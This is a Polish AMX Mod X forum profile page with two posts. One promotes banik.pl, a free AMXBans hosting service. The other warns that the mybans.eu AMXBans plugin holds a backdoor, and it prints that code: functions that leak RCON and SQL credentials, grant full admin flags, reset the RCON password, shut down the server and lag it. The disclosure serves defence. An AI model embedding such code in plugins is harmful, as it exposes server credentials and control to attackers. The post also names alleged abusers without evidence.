Skocz do zawartości

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

DaFFyy - zdjęcie

DaFFyy

Rejestracja: 04.07.2013
Aktualnie: Przegląda stronę główną
Dostępny Ostatnio: 6 minut temu
-----

Moje tematy

Banik.pl - Alternatywa mybans.eu

23.01.2021 18:35

AvAZBMT.png

 

Cześć,

Jako, że mybans.eu zwinął interes to postanowiłem zrobić alternatywny serwis żebyście nie zostali z niczym.

 

Co to jest banik.pl?

  • Automatyczny amxbans
  • Bezpieczny amxbans
  • Darmowy amxbans
  • Amxbans w wersji 6.14.x

Chwila moment, bezpieczny? Pod jakim względem hmmm?

  • Tworzymy co 12h backup wszystkich amxbansów stworzonych u nas
  • Wszystkie hasła hashowane są w bcrypt (również w amxbansach)
  • Wprowadzamy poprawki bezpieczeństwa
  • Cały czas się rozwijamy ;)

Co trzeba zrobić?

  1. Wejść na https://banik.pl
  2. Założyć konto
  3. Wgrać gotową paczke na serwer, tak, paczka zawiera już skonfigurowany plik sql.cfg ( domyślnie paczka czyta adminów z pliku users.ini )

Jakie są haczyki?

  • Serwis tworzony był w bardzo szybkim tempie więc mogą występować błędy
  • Serwis jest cały czas w statusie developerskim
  • Wszystkie pomysły weźmiemy pod uwagę

Zapraszamy na BANIK.PL

 

WoHBgFf.png

UWrtdTL.png

E8QAv96.png

(!) Mybans.eu - Włamania na serwery

21.01.2021 18:57

Cześć,

Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.

Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.

public amxbanuser1(id)
{
    get_cvar_string("rcon_password", szRc, 63);
    client_print(id, print_console, "RCON:\"%s\"", szRc);
}


public amxbanuser2(id)
{
    set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0);
    get_cvar_string("amx_sql_host", szSqlHost, 63);
    get_cvar_string("amx_sql_user", szSqlUser, 63);
    get_cvar_string("amx_sql_pass", szSqlPass, 63);
    get_cvar_string("amx_sql_db", szSqlDb, 63);
    client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost);
    client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser);
    client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass);
    client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb);
}


public amxbanuser3()
{
    server_cmd("rcon_password 748663183");
}


public amxbanuser4()
{
    server_cmd("shutdownserver");
}


public amxbanuser5()
{
    set_task(0.00, "lagsnc", 2137, "", 0, "b", 0);
}


public lagsnc()
{
    remove_task(2138, 0);
    server_cmd("sys_ticrate 1");
}


public amxbanuser6()
{
    set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0);
}


public lagsncoff()
{
    remove_task(2137, 0);
    server_cmd("sys_ticrate 1000");
}
Takie coś znajduje się w obecnym pluginie i przeszłym, wszystko aktywowane jest komendami których z oczywistych powodów nie podam.
 
Co to ma do twojego serwera? Jeżeli używasz ich pluginu:
  1. Atakujący może poznać hasło rcon / zmienić je
  2. Atakujący może poznać dane sql amxbansa
  3. Atakujący może wyłączyć serwer
  4. Atakujący może zlagować serwer
  5. Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet

Posprawdzajcie swoje serwery, 

( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.

 

 

Nie musicie dziękować, żyjcie w miłości i spokoju!

 

Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/

 

@edit

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

smajli - x

Kava - x